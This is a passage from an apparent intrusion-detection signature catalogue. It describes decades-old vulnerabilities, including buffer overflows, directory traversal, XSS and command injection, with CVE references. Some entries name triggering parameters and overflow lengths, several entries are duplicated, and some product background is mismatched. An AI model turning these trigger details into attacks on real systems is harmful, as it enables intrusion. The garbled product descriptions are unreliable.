Signature Description: TrackerCam is the official software for TrackerPod, a robotic tripod used to provide movement to a webcam, but this software can be used with any webcam. TrackerCam version 5.12 and earlier are vulnerable to an information disclosure vulnerability via the 'ComGetLogFile.php3' script. By default TrackerCam runs on TCP port 8090 and acts as a web server. A remote attacker can send an HTTP request for the 'ComGetLogFile.php3' script with a known log filename as the 'fn' parameter argument and view the log contents, which may disclose sensitive information. Restrict access to port 8090 to trusted clients only.
Signature ID: 1277
Eagletron TrackerCam 'User-Agent' Field Buffer Overflow Vulnerability
Threat Level: Severe
Industry ID: CVE-2005-0478 Bugtraq: 12592
Signature Description: TrackerCam is the official software for TrackerPod, a robotic tripod used to provide movement to a webcam, but this software can be used with any webcam. TrackerCam version 5.12 and earlier are vulnerable to a buffer overflow while handling the 'User-Agent' HTTP header field. By default TrackerCam runs on TCP port 8090 and acts as a web server. A remote attacker can send an HTTP request with an overly long 'User-Agent' HTTP header containing more than 216 bytes to overflow the buffer and execute arbitrary code on the system. Restrict access to port 8090 to trusted clients only.
Signature ID: 1278
Eagletron TrackerCam Content-Length Field Denial of Service Vulnerability
Threat Level: Severe
Industry ID: CVE-2005-0482 Bugtraq: 12592
Signature Description: TrackerCam is the official software for TrackerPod, a robotic tripod used to provide movement to a webcam, but this software can be used with any webcam. TrackerCam version 5.12 and earlier are vulnerable to a denial of service when HTTP requests with a negative or large Content-Length field value are received. By default TrackerCam runs on TCP port 8090 and acts as a web server. A remote attacker can send specially crafted HTTP requests with a negative or large Content-Length field value. When multiple requests (at least 300) of this type are received, the application may crash. Restrict access to port 8090 to trusted clients only.
Signature ID: 1279
Eagletron TrackerCam Long PHP Argument Buffer Overflow Vulnerability
Threat Level: Severe
Industry ID: CVE-2005-0478 Bugtraq: 12592
Signature Description: TrackerCam is the official software for TrackerPod, a robotic tripod used to provide movement to a webcam, but this software can be used with any webcam. TrackerCam version 5.12 and earlier are vulnerable to a buffer overflow caused by improper handling of the argument to any PHP script of TrackerCam. By default TrackerCam runs on TCP port 8090 and acts as a web server. A remote attacker can send an HTTP request with an overly long (more than 256 bytes) PHP argument to overflow the buffer and execute arbitrary code on the system. Restrict access to port 8090 to trusted clients only.
Signature ID: 1281
Trend Micro OfficeScan Unauthenticated CGI Usage Vulnerability
Threat Level: Warning
Bugtraq: 1057
Signature Description: Trend Micro OfficeScan is an antivirus software program which is deployable across an entire network. Trend Micro OfficeScan For Microsoft SBS 4.5 and Trend Micro OfficeScan Corporate Edition for Windows NT Server 3.13, 3.11, 3.5 and 3.0 are vulnerable versions. A remote attacker could send a specially crafted request to the server; on receiving such requests, the Trend Micro OfficeScan applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalation of privileges to those of the administrator.
Signature ID: 1282
Trend InterScan VirusWall Remote Reconfiguration Vulnerability
Threat Level: Warning
Industry ID: CVE-2001-0432 CVE-2001-0791 Bugtraq: 2808,2579 Nessus: 10733
Signature Description: Trend Micro's InterScan VirusWall blocks viruses, malicious applets and ActiveX objects at the Internet gateway, and provides real-time scanning for all inbound and outbound SMTP, HTTP and FTP file transfers. Trend Micro InterScan VirusWall for Windows NT 3.51, 3.5 and 3.4 are vulnerable versions; these versions do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. A malicious user (remote attacker) could send a specially crafted URI request, which these vulnerable versions do not properly validate. This can lead to unauthorized access and possibly escalation of privileges to those of the administrator, after which the attacker can make configuration changes.
Signature ID: 1283
Trend InterScan VirusWall Remote Reconfiguration Vulnerability
Threat Level: Warning
Industry ID: CVE-2001-0432 CVE-2001-0791 Bugtraq: 2808,2579 Nessus: 10733
Signature Description: Trend Micro's InterScan VirusWall blocks viruses, malicious applets and ActiveX objects at the Internet gateway, and provides real-time scanning for all inbound and outbound SMTP, HTTP and FTP file transfers. Trend Micro InterScan VirusWall for Windows NT 3.51, 3.5 and 3.4 are vulnerable versions; these versions do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. A malicious user (remote attacker) could send a specially crafted URI request, which these vulnerable versions do not properly validate. This can lead to unauthorized access and possibly escalation of privileges to those of the administrator, after which the attacker can make configuration changes.
Signature ID: 1284
Apache WebDAV Directory Listings Vulnerability
Threat Level: Warning
Industry ID: CVE-2000-0869 Bugtraq: 1656
Signature Description: WebDAV is a web publishing protocol. Certain configurations of Apache, such as those shipped with SuSE 6.0-7.0 and RedHat 6.2-7.0, have WebDAV enabled and misconfigured in such a way as to allow directory listings of the entire server file structure; specifically, WebDAV was enabled on the Document Root of the web server. Since subdirectories of a WebDAV-enabled directory are automatically enabled as well, this caused the entire web server to have WebDAV enabled. Since a directory, or its parent directory, must have been specifically declared for WebDAV to be enabled, configuration errors should be straightforward to find and correct.
Signature ID: 1285
Webtrends HTTP probe Vulnerability
Threat Level: Information
Signature Description: WebTrends Security Analyzer is used to secure intranets and extranets by scanning remote and local systems to discover known security vulnerabilities. If such vulnerabilities are left unchecked, an attacker can access sensitive information, or damage or gain control of the device.
Signature ID: 1286
Banner engine Cross-Site Scripting Vulnerability
Threat Level: Warning
Industry ID: CVE-2006-3519 CVE-2000-0426 CVE-2000-0332 CVE-2002-0749 Bugtraq: 18793,1175,1164,4579
Nessus: 11748
Signature Description: Native Solutions The Banner Engine (tbe) 4.0 and prior are vulnerable to cross-site scripting. A remote attacker could exploit this vulnerability using the 'adminlogin', 'adminpass' or 'text' parameter to execute script in a victim's web browser within the security context of the hosting web site, allowing the attacker to steal the victim's cookie-based authentication credentials.
Signature ID: 1287
Microsoft IE Crafted URL Cross Domain Cookie Disclosure vulnerability
Threat Level: Warning
Industry ID: CVE-2000-0439 Bugtraq: 1194
Signature Description: Windows Internet Explorer (MSIE), commonly abbreviated to IE, is a series of graphical web browsers developed by Microsoft and included as part of the Microsoft Windows line of operating systems. Microsoft Internet Explorer 4.0, 4.0.1, 5.0 and 5.01 are vulnerable to cross-domain cookie disclosure. By embedding a specially crafted URL with certain escape characters, a malicious web site operator can trick Internet Explorer into thinking the pages originated from another domain, allowing the operator to access cookies from the spoofed domain.
Signature ID: 1288
Avenger's News System Directory Traversal Vulnerability
Threat Level: Warning
Industry ID: CVE-2002-0307 CVE-2002-0306 Bugtraq: 4147,4149 Nessus: 10875
Signature Description: Avenger's News System (ANS) is a simple form-based web site management tool written in Perl. It is useful for creating a web site that is easy to update and maintain, instead of constantly uploading new news pages and wrestling with HTML. It runs on most Unix and Linux variants. Avenger's News System 2.11 and earlier versions are vulnerable: they do not filter dot-dot-slash (../) sequences from web requests, so a malicious user (remote attacker) can send a request with dot-dot-slash sequences in the 'p' (plugin) parameter, making the application prone to directory traversal attacks. As a result, the attacker may display the contents of arbitrary web-readable files. No remedy is available. This signature generates a log entry whenever the ans.pl file is accessed.
Signature ID: 1289
Avenger's News System Directory Traversal Vulnerability
Threat Level: Warning
Industry ID: CVE-2002-0306 CVE-2002-0307 Bugtraq: 4147,4149 Nessus: 10875
Signature Description: Avenger's News System (ANS) is a simple form-based web site management tool written in Perl. It is useful for creating a web site that is easy to update and maintain, instead of constantly uploading new news pages and wrestling with HTML. It runs on most Unix and Linux variants. Avenger's News System 2.11 and earlier versions are vulnerable: they do not filter dot-dot-slash (../) sequences from web requests, so a malicious user (remote attacker) can send a request with dot-dot-slash sequences in the 'p' (plugin) parameter, making the application prone to directory traversal attacks. As a result, the attacker may display the contents of arbitrary web-readable files. No remedy is available.
Signature ID: 1290
Sun AnswerBook2 Unauthorized Administrative Script Access
Threat Level: Information
Industry ID: CVE-2000-0696 Bugtraq: 5383,1554
Signature Description: Sun Microsystems Solaris AnswerBook2 versions 1.4.2 and prior contain a flaw that may allow a malicious user to create an arbitrary account. This vulnerability is due to a lack of authentication checks for certain scripts within the administration interface of AnswerBook2. Successful exploitation of this vulnerability allows an attacker to access sensitive information on the vulnerable system. This issue is fixed in AnswerBook2 version 1.4.2 patched or higher. Administrators are advised to update to 1.4.2 patched or a later version to resolve this issue.
Signature ID: 1291
Answerbook2 arbitrary command execution
Threat Level: Information
Industry ID: CVE-2000-0697 Bugtraq: 1556
Signature Description: Sun Microsystems Solaris AnswerBook2 versions 1.4.2 and prior contain a flaw that may allow a malicious user to create an arbitrary account. This vulnerability is due to insufficient input validation in the CGI scripts of the Answerbook2 administration interface, and can be triggered by sending a specially crafted URL request containing shell metacharacters to port 8888. Successful exploitation of this vulnerability allows an attacker to access sensitive information on the vulnerable system. This issue is fixed in AnswerBook2 version 1.4.2 patched or higher. Administrators are advised to update to 1.4.2 patched or a later version to resolve this issue.
Signature ID: 1292
Apache 1.3.20 Possible Directory Index Disclosure attempt vulnerability
Threat Level: Warning
Industry ID: CVE-2001-0731 Bugtraq: 3009
Signature Description: Apache Tomcat is an implementation of the Java Servlet and JavaServer Pages technologies. The Java Servlet and JavaServer Pages specifications are developed under the Java Community Process. Apache 1.3.20 and prior versions are vulnerable; this version could cause directory contents to be disclosed. When the "Multiviews" option is enabled, a malicious user (remote attacker) could send a specially crafted URL containing the "M=D" query string to bypass the index page and obtain a listing of the directory contents. An attacker could use this information to launch further attacks against the affected server.
Signature ID: 1295
CafeLog b2 Weblog Tool 2.06pre4 arbitrary command execution vulnerability
Threat Level: Warning
Industry ID: CVE-2002-1466 Bugtraq: 4673 Nessus: 11667
Signature Description: A weblog has posts that appear on the home page which are written by a group of people, instead of by a single author. The Multi-Author Weblog Tool makes it easy to use Radio to create a multi-authored weblog. Cafelog b2 0.6 pre is vulnerable to arbitrary code execution; this version does not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalation of privileges to those of the administrator.
Signature ID: 1296
Backup files access Vulnerability
Threat Level: Information
Signature Description: The Backup utility in the Microsoft Windows operating system helps protect data if a hard disk fails or files are accidentally erased due to hardware or storage media failure. By using Backup, you can create a duplicate copy of the data on the hard disk. Backup files can contain script sources, configuration files or other sensitive information. This event detects when an attacker accesses a backup file.
Signature ID: 1297
Bad HTTP/1.1 request Vulnerability
Threat Level: Information
Signature Description: HTTP (Hypertext Transfer Protocol) is an application protocol. It is used for transferring files (text, graphic images, sound, video, and other multimedia files) on the World Wide Web. This rule triggers when an attacker sends a request such as GET / HTTP/1.1\r\n\r\n without a "Host" header; the web server will then respond with HTTP/1.1 400 Bad Request. Such probing can help an attacker prepare further attacks.
Signature ID: 1298
PCCS Mysql Database Admin Tool Username/Password Exposure Vulnerability
Threat Level: Warning
Industry ID: CVE-2000-0707 Bugtraq: 1557
Signature Description: The PCCS-Linux MySQL Database Admin Tool is a web-based front-end to the MySQL database server written in PHP. PCCS-Linux MySQLDatabase Admin Tool 1.2.4 and 1.2.3 are vulnerable to unauthorized access. The default installation places an include file in a directory that can be accessed by the web server. This include file, dbconnect.inc, contains information such as the username and password used to connect to the database in plain text, which can be disclosed if it is requested via HTTP. PCCS MySQL DB Admin Tool v1.2.3 and prior are affected by this issue. Update to PCCS-Linux MySQLDatabase Admin Tool 1.2.5.
Signature ID: 1299
Netscape Communicator Long Argument Vulnerability
Threat Level: Warning
Industry ID: CVE-1999-1189 CVE-2000-1187 Bugtraq: 822
Signature Description: Netscape Navigator and Netscape are the names for the proprietary web browser, and the flagship product of the Netscape Communications Corporation. Netscape Navigator/Communicator 4.7 is vulnerable to a buffer overflow. By creating a specially crafted URL containing an overly long argument to an .asp, .cgi, .html, or .pl file and hosting it on a web page or sending it within an email message, a remote attacker can overflow a buffer and cause the program to crash or execute arbitrary commands on the victim's system once the URL link is clicked.
Signature ID: 1300
NetScape Browser Buffer Overflow Vulnerability while parsing HTML code
Threat Level: Warning
Industry ID: CVE-2000-1187 CVE-1999-1189 Bugtraq: 822
Signature Description: Netscape Navigator and Netscape are the names for the proprietary web browser, and the flagship product of the Netscape Communications Corporation. Netscape Navigator/Communicator 4.7 and Netscape 4.75 are vulnerable, allowing attackers to execute arbitrary code. A malicious user (remote attacker) could send a specially crafted request to the server containing an overly long password value; because the given input is not properly validated, a buffer overflow occurs while the request is processed, and the remote attacker can execute arbitrary code on a visiting user's computer, resulting in a loss of confidentiality and integrity.
Signature ID: 1301
PHP File Upload GLOBALS Overwrite Vulnerability
Threat Level: Warning
Industry ID: CVE-2005-3390 Bugtraq: 15250
Signature Description: PHP is a widely-used general-purpose scripting language that is especially suited for web development and can be embedded into HTML. PHP versions 4.x up to 4.4.0 and 5.x up to 5.0.5 are susceptible to a vulnerability that allows attackers to execute arbitrary PHP code on the target system when 'register_globals' is turned on. A remote user can send a form-data POST request containing a file upload field with the name "GLOBALS" to cause the $GLOBALS array to be overwritten. This allows attackers to execute arbitrary PHP code or further exploit latent vulnerabilities in PHP scripts.
Signature ID: 1302
PHP File Upload GLOBAL Variable Overwrite Vulnerability
Threat Level: Warning
Industry ID: CVE-2005-3390 Bugtraq: 15250
Signature Description: PHP is a widely-used general-purpose scripting language that is especially suited for web development and can be embedded into HTML. PHP 4.x up to 4.4.0 and 5.x up to 5.0.5 are prone to a vulnerability that allows attackers to overwrite the GLOBAL variable via HTTP POST requests. The vulnerability is caused by a weakness in the file upload code that allows modifying (i.e., overwriting) the GLOBALS array and bypassing security protections of PHP applications via a multipart/form-data POST request with a "GLOBALS" file upload field, when register_globals is turned on. Overwriting this array can lead to unexpected security holes in code assumed secure.
Signature ID: 1303
Mozilla/Netscape/Firefox Browsers Domain Name Buffer Overflow Vulnerability
Threat Level: Severe
Industry ID: CVE-2005-2871 Bugtraq: 14784
Signature Description: Mozilla products, including the Mozilla Suite, and Mozilla Firefox are vulnerable to a heap
overflow in the way they handle URLs containing certain IDN encoded host names. The vulnerability occurs because
of an error in the conversion of a host name consisting of Unicode "soft hyphen" characters (U+00AD) to the UTF-8
character set. The vulnerability can be exploited by convincing a user to view an HTML document which sends a
specially-crafted HTML file containing the 0xAD character in the domain name. A successful attack may result in a
crash of the application or the execution of arbitrary code. To protect against this attack, Mozilla users are advised to
patch their systems. Firefox 1.0.6 and 1.5 Beta 1 are vulnerable to this issue. Mozilla 1.7.11 and Netscape 8.0.3.3 and
7.2 are affected as well.
Signature ID: 1304
Mozilla/Netscape/Firefox Browsers Domain Name Buffer Overflow Vulnerability
Threat Level: Severe
Industry ID: CVE-2005-2871 Bugtraq: 14784
Signature Description: Mozilla Firefox is a free and open source web browser descended from the Mozilla Application
Suite, managed by the Mozilla Corporation. Mozilla products, including the Mozilla Suite, and Mozilla Firefox are
vulnerable to a heap overflow in the way they handle URLs containing certain IDN encoded hostnames. The
vulnerability occurs because of an error in the conversion of a hostname consisting of Unicode "soft hyphen" characters
(U+00AD) to the UTF-8 character set. The vulnerability can be exploited by convincing a user to view an HTML
document which sends a specially-crafted HTML file containing the 0xAD character in the domain name. A successful
attack may result in a crash of the application or the execution of arbitrary code. To protect from this attack Mozilla
users are advised to patch their systems. Firefox 1.0.6 and 1.5 Beta 1 are vulnerable to this issue. Mozilla 1.7.11 and
Netscape 8.0.3.3 and 7.2 are affected as well.
Signature ID: 1305
RealNetworks RealPlayer/HelixPlayer RealPix Format String Vulnerability
Threat Level: Severe
Industry ID: CVE-2005-2710 Bugtraq: 14945
Signature Description: The Helix Player is the Helix Community's open source media player for consumers. The
RealPlayer for Linux is built on top of the Helix Player for Linux and includes support for several non-open source
components including RealAudio/RealVideo, MP3, etc. A format string vulnerability exists in Helix Player (10.0.0 - 5)
that allows a remote attacker to execute code on the victim's computer. The vulnerability specifically exists because of
the improper usage of a formatted printing function. This vulnerability can be exploited by a specially crafted RealPix
(.rp) or RealText (.rt) file. Administrators are advised to patch machines running vulnerable RealPlayer or Helix Player.
Signature ID: 1306
RealNetworks RealPlayer/HelixPlayer RealPix Format String Vulnerability
Threat Level: Severe
Industry ID: CVE-2005-2710 Bugtraq: 14945
Signature Description: The Helix Player is the Helix Community's open source media player for consumers. The
RealPlayer for Linux is built on top of the Helix Player for Linux and includes support for several non-open source
components including RealAudio/RealVideo, MP3, etc. Real HelixPlayer and RealPlayer 10 contain a format string
vulnerability. These vulnerable versions allow a remote attacker to execute code on the victim's computer. The
vulnerability specifically exists because of the improper usage of a formatted printing function. A server could send
specially crafted files with the .rp and .rt extensions; the vulnerability can be exploited by a specially crafted RealPix
(.rp) or RealText (.rt) file. Administrators are advised to patch machines running vulnerable RealPlayer or Helix
Player.
Signature ID: 1307
Apache 2.0 Path Disclosure Vulnerability
Threat Level: Warning
Industry ID: CVE-2002-0654 Bugtraq: 5485,5486
Signature Description: Apache HTTP Server is a very popular freely available web server that runs on a variety of
operating systems, including UNIX, Linux, and Microsoft Windows (Win32). Apache 2.0 through 2.0.39 on Windows,
OS2, and Netware are vulnerable versions; these versions of Apache HTTP Server could allow a remote attacker to
obtain the full path to the Apache installation directory, caused by a vulnerability in the multiview type map
negotiation. A malicious user (remote attacker) sends a specially-crafted URL request with .var appended, causing an
error message to be returned that contains the full path to the installation directory. The malicious user (remote
attacker) could use this vulnerability to obtain sensitive information, such as the operating system and server version.
This information could then be used to launch further attacks against the affected Web server.
Signature ID: 1308
Apache Web Server Linefeed Memory Allocation Denial Of Service Vulnerability
Threat Level: Warning
Industry ID: CVE-2003-0132 Bugtraq: 7254
Signature Description: Apache HTTP Server is a very popular freely available web server that runs on a variety of
operating systems, including UNIX, Linux, and Microsoft Windows (Win32). Apache 2.0 through 2.0.44 and prior
versions are vulnerable; these versions allow remote attackers to cause a denial of service. The malicious user (remote
attacker) sends a request with large chunks of linefeed characters, which causes Apache to allocate 80 bytes for each
linefeed. After receiving this type of request, Apache cannot properly handle the resulting memory consumption, which
causes a denial of service. Exploitation of this vulnerability may allow an attacker to consume all available system
resources, resulting in a denial-of-service condition.
Signature ID: 1309
ESignal v7 remote buffer overflow Vulnerability
Threat Level: Warning
Bugtraq: 9978
Signature Description: ESignal is the nation's leading provider of real-time financial and market information. eSignal is
a popular platform for institutional and professional traders. eSignal is a market data solution bundled for best value for
small to mid-size institutional investors that also includes additional optional services. eSignal 7.6 and eSignal 7.5
contain a stack-based buffer overflow vulnerability. The eSignal main application "WinSig.exe" listens for incoming
data requests on TCP port 80. While parsing requests, it suffers from a classic stack-based buffer overflow (due to
invalid bounds checking): when a parameter string is about 1040 characters long, the overflow occurs in Specs.dll and
EIP is fully controllable, as the function return address on the stack is completely overwritten. This vulnerability may
allow execution of arbitrary code.
Signature ID: 1310
Mozilla Firefox iframe.contentWindow.focus Deleted Object Reference Vulnerability
Threat Level: Severe
Industry ID: CVE-2006-1993 Bugtraq: 17671
Signature Description: Mozilla Firefox is a free, open source, cross-platform graphical web browser. Firefox provides a
facility to load the web pages in sidebar web panel. Mozilla Firefox version 1.5.0.2 is prone to a vulnerability when
rendering malformed JavaScript content. An attacker could exploit this issue to cause the browser to fail or potentially
execute arbitrary code. The issue is caused by a memory corruption vulnerability that can occur when "designMode" is
set to "on". A successful attack can result in execution of arbitrary code or cause a victim's browser to crash by creating
a malicious Web page that uses the contentWindow.focus() JavaScript control to reference a deleted object.
Signature ID: 1311
Basilix Webmail Incorrect File Permissions Vulnerability
Threat Level: Warning
Industry ID: CVE-2001-1044 Bugtraq: 2198 Nessus: 10601
Signature Description: Webmail lets a user check e-mail from any computer with Internet access without downloading
messages to the local computer. It also allows sending attachments, creating an address book and signature file,
filtering mail using rules, and using folders to sort and manage messages. Murat Arslan BasiliX Webmail 0.9.7beta is
vulnerable to directory traversal. Basilix is a PHP and IMAP based Webmail application that uses the MySQL
database server. If the Web server is not configured to recognize files with ".class" or ".inc" extensions as PHP scripts,
a remote attacker can send an HTTP request to view these files, which may contain sensitive data, such as the MySQL
password and username information.
Signature ID: 1312
BulletScript MailList bsml.pl Information Disclosure Vulnerability
Threat Level: Warning
Bugtraq: 9311 Nessus: 11973
Signature Description: BulletScript MailList is a CGI script used to handle mailing lists. A directory traversal
vulnerability exists in all versions of the BulletScript MailList software that may allow remote attackers to gain access
to sensitive information. A remote attacker could send a specially-crafted request to the bsml.pl script with invalid
values for the "action" parameter. The information gathered via these attacks may aid an attacker in mounting further
attacks against a vulnerable system and the affected users.
Signature ID: 1313
CPanel resetpass remote command execution Vulnerability
Threat Level: Warning
Industry ID: CVE-2004-1769 Bugtraq: 9848
Signature Description: cPanel (control Panel) is a graphical web-based web-hosting control panel, designed to
simplify administration of websites. cPanel handles aspects of website administration in its interface. cPanel 9.1, 9.0,
8.0, 7.0, 6.4.2 .STABLE_48, 6.4.2, 6.4.1, 6.4, 6.2, 6.0, 5.3, and 5.0 are vulnerable versions. An attacker could send a
malicious URI request to the affected script, supplying shell metacharacters and arbitrary commands as the value of
the affected variable. Because the script that handles resetting user passwords does not properly validate the
user-supplied data in such a request, remote command execution is possible.
Signature ID: 1315
ICat Carbo Server File Disclosure Vulnerability
Threat Level: Warning
Industry ID: CVE-1999-1069 Bugtraq: 2126
Signature Description: ICat Electronic Commerce Suite is an application which enables a user to create and manage
web based catalogues. carbo.dll in iCat Electronic Commerce Suite 3.0 allows remote attackers to read arbitrary files
via directory traversal using a relative path. It is possible to access any object on the system. The attacker sends a
specially-crafted request with a directory traversal sequence (../) as the icatcommand parameter value. Successful
exploitation of this vulnerability may disclose sensitive information such as usernames and passwords and aid in the
development of further attacks.
Signature ID: 1317
Parent directory traversal Vulnerability
Threat Level: Warning
Signature Description: Cd, also known as chdir (change directory), is a command to change the current working
directory in operating systems such as Unix and DOS. 'cd..' is used to go back one directory on the majority of Unix
shells. This signature detects the command "cd.."; an attacker may be attempting to access or read files beyond the root
directory.
Signature ID: 1318
HTTP Request with Negative Content-Length Vulnerability
Threat Level: Severe
Industry ID: CVE-2004-0095 CVE-2004-0245 Bugtraq: 9576,9476
Signature Description: This rule triggers when a malicious HTTP request contains a negative value for the
Content-Length field in the HTTP header. McAfee ePolicy Orchestrator 3.0 is vulnerable to a buffer overflow. A remote
attacker could send an HTTP POST request with an invalid value in the Content-Length header; when McAfee ePolicy
Orchestrator receives this type of request it cannot respond, and the device will crash or possibly execute arbitrary
code. Thus the attacker could overflow a buffer and cause the system to crash, or possibly execute arbitrary code on
the system.
Signature ID: 1319
NAI PGP Keyserver WebAdmin Interface Authentication Bypassing Vulnerability
Threat Level: Warning
Industry ID: CVE-2001-1252 Bugtraq: 3375
Signature Description: A key server is a computer, typically running special software, which provides keys to users or
other programs. The users or programs can be working on that or another networked computer. KeyServer is the most
widely used network-independent software license manager for Macintosh and Windows-based computers. PGP
Keyserver 7.0 and PGP Keyserver 7.0.1 are vulnerable versions; these versions are vulnerable to a denial of service
attack, caused by a vulnerability in the default permissions of the Web interface that allows a malicious user (remote
attacker) to access administrative features without authentication. The flaw is due to the server not validating input to
the "action" variable in the "console.exe" script. This may allow an attacker to manipulate administrative features and
configuration options.
Signature ID: 1320
Microsoft Site Server 3.0 Content Upload Denial of Service Vulnerability
Threat Level: Warning
Industry ID: CVE-1999-0360 Bugtraq: 4002,1811
Signature Description: Microsoft Site Server is a solution to the growing business of Internet-based commerce (or e-commerce). Site Server expanded on Merchant Server's functionality by adding content management tools, which
would typically be involved, it was thought, in facilitating the management of Web-facing content. It is designed to run
on Microsoft Windows NT Server platforms. Microsoft Site Server (Commerce Edition) 3.0 and 3.0 SP1 through SP4,
on both the i386 and alpha platforms, have this vulnerability. Valid NT user accounts may use the module cphost.dll to
upload content for Site Server 3.0. During this process, temporary files are created in the location C:\Temp, which is
not configurable. If a malicious party uploads content with a Target URL parameter of more than approximately 250
characters, the upload process will fail, and the temporary file will not be deleted. An authenticated attacker may
exploit this to exhaust all drive space on the C drive.
Signature ID: 1321
PHPBB2 Image Tag HTML Injection Vulnerability
Threat Level: Warning
Industry ID: CVE-2002-0902 Bugtraq: 4858
Signature Description: phpBB (short for php Bulletin Board) is one of the most powerful and commonly used forum
systems nowadays. It is suitable for newbies as well as more technically oriented users. phpBB is an open source
project and can be used for FREE. phpBB 2.0 and prior versions are vulnerable to cross-site scripting. A malicious
user (remote attacker) could embed malicious script (attack script) in a forum message within BBCode image tags by
using a double quotation character (") to escape the image source location and insert arbitrary script. The script would
be executed within a victim's Web browser once the message is viewed. An attacker could use this vulnerability to
steal a user's cookie-based authentication credentials.
Signature ID: 1322
NAI PGP Keyserver WebAdmin Interface Authentication Bypassing Vulnerability
Threat Level: Warning
Industry ID: CVE-2001-1252 Bugtraq: 3375
Signature Description: A key server is a computer, typically running special software, which provides keys to users or
other programs. The users or programs can be working on that or another networked computer. KeyServer is the most
widely used network-independent software license manager for Macintosh and Windows-based computers. PGP
Keyserver 7.0 and PGP Keyserver 7.0.1 are vulnerable versions; these versions are vulnerable to a denial of service
attack, caused by a vulnerability in the default permissions of the Web interface that allows a malicious user (remote
attacker) to access administrative features without authentication. The flaw is due to the server not validating input to
the "action" variable in the "cs.exe" script. This may allow an attacker to manipulate administrative features and
configuration options.
Signature ID: 1323
Cybercop scanner network vulnerability
Threat Level: Information
Signature Description: CyberCop Scanner is a commercial network security assessment component that can scan
devices on the network for vulnerabilities. The results of a scan could provide information about the weaknesses of the
network and its systems. This information could be useful to an attacker for performing an attack.
Signature ID: 1324
Mobius DocumentDirect for the Internet 1.2 Buffer Overflow vulnerability
Threat Level: Information
Industry ID: CVE-2000-0826 CVE-2000-0828 Bugtraq: 1657 Nessus: 11728
Signature Description: Mobius Management Systems DocumentDirect for the Internet 1.2 is vulnerable to a stack-based
buffer overflow; a number of unchecked static buffers exist in this version. By sending a GET request to ddicgi.exe
containing a string of 1553 characters or more, a remote attacker can overflow a buffer in ddicgi.exe to execute
arbitrary code or crash the system.
Signature ID: 1325
EditTag edittag.pl File Disclosure Vulnerability
Threat Level: Warning
Bugtraq: 6675
Signature Description: EditTag is a script which facilitates website content management. EditTag allows users to edit
pages using a web interface, but restricts editing to specific tagged areas of the document. This feature enables website
managers to create a way for content authors who may not know HTML to update a web page in real time without
having to worry about adversely affecting the underlying HTML code. Greg Billock EditTag 1.1 is a vulnerable version:
a malicious user (remote attacker) could send a request that contains encoded directory traversal sequences. Because
the EditTag 'edittag.pl' Perl script does not properly validate the CGI parameters in such a request, this results in the
disclosure of arbitrary web-server-readable files.
Signature ID: 1326
CGI Perl mail programs allow execution of arbitrary commands vulnerability
Threat Level: Information
Industry ID: CVE-1999-1155
Signature Description: Many Perl-based CGI mail programs accept metacharacters in the recipient's email address
field. A malicious user (remote attacker) can insert specially-crafted metacharacters into this field to execute arbitrary
commands on the system running the script.
Signature ID: 1327
Virtual Visions FTP Browser directory traversal vulnerability
Threat Level: Warning
Industry ID: CVE-2000-0674 Bugtraq: 1471 Nessus: 10467
Signature Description: The Virtual Visions FTP Browser is a CGI script that provides an HTML interface to files that
are available to download. FTP Browser allows a user to display an HTML-enhanced directory listing, which is great
for managing user FTP files. Virtual Visions FTP Browser 1.0 is a version vulnerable to directory traversal. A
malicious user (remote attacker) could send a URL request containing "dot dot" sequences (/../) to the server as the
"dir" parameter value; because the script does not properly validate the user-supplied data in such a request, it is
possible to traverse directories and retrieve arbitrary files from the Web server. This signature detects whenever a user
tries to access ftp.pl.
Signature ID: 1328
Virtual Visions FTP Browser directory traversal vulnerability
Threat Level: Warning
Industry ID: CVE-2000-0674 Bugtraq: 1471 Nessus: 10467
Signature Description: The Virtual Visions FTP Browser is a CGI script that provides an HTML interface to files that
are available to download. FTP Browser allows a user to display an HTML-enhanced directory listing, which is great
for managing user FTP files. Virtual Visions FTP Browser 1.0 is a version vulnerable to directory traversal. A
malicious user (remote attacker) could send a URL request containing "dot dot" sequences (/../) to the server as the
"dir" parameter value; because the script does not properly validate the user-supplied data in such a request, it is
possible to traverse directories and retrieve arbitrary files from the Web server.
Signature ID: 1329
PHP-Survey Global.INC Information Disclosure Vulnerability
Threat Level: Information
Industry ID: CVE-2002-0614 Bugtraq: 4612
Signature Description: PHP-Survey is an online survey creation and management system written in PHP. It uses a
MySQL database on the backend for all data handling. PHP-Survey 20000615 and prior could allow a remote attacker
to gain sensitive information. This issue is triggered when an attacker submits an HTTP request for the global.inc file
(global.inc holds the database information, and it contains user names and passwords). Successful exploitation can
allow an attacker to gain sensitive information such as user names, passwords, and the localhost. No remedy was
available as of September 2008.
Signature ID: 1330
Oracle 9IAS OracleJSP Information Disclosure vulnerability
Threat Level: Warning
Industry ID: CVE-2002-0562 CVE-2002-0565 Bugtraq: 4034 Nessus: 10850
Signature Description: The Oracle Application Server is a platform for developing, deploying, and integrating
enterprise applications. This software is produced and marketed by Oracle Corporation. Oracle 9i Application
Server(9iAS) comes with an Apache-based web server and support for environments such as SOAP, PL/SQL, XSQL
and JSP. A file called 'globals.jsa' is available on the server without user restrictions if the default settings are used.
Sensitive information including user names and passwords is stored in this file. Information obtained by an attacker
can then be used in further attacks.
Signature ID: 1332
IRIX cgi-bin handler access vulnerability
Threat Level: Warning
Industry ID: CVE-1999-0148 Bugtraq: 380 Nessus: 10100
Signature Description: IRIX is an operating system; it is the leading technical high-performance 64-bit operating
system based on industry-standard UNIX. SGI has been designing scalable platforms based on the IRIX operating
system to connect technical and creative professionals to a world of innovation and discovery. SGI IRIX 6.4, SGI IRIX
6.3, SGI IRIX 6.2, and SGI IRIX 5.3 are vulnerable versions that allow execution of arbitrary code. A vulnerability
exists in the cgi-bin program 'handler', as included by Silicon Graphics in their Irix operating system. These vulnerable
versions allow a remote attacker to execute arbitrary commands on the vulnerable host as the user the web server is
running as. This can easily result in a user being able to access the system. This signature generates a log entry when
"/cgi-bin/handler/" is accessed.
Signature ID: 1333
IRIX cgi-bin handler execute arbitrary commands vulnerability
Threat Level: Warning
Industry ID: CVE-1999-0148 Bugtraq: 380 Nessus: 10100
Signature Description: IRIX is an operating system; it is the leading technical high-performance 64-bit operating
system based on industry-standard UNIX. SGI has been designing scalable platforms based on the IRIX operating
system to connect technical and creative professionals to a world of innovation and discovery. SGI IRIX 6.4, SGI IRIX
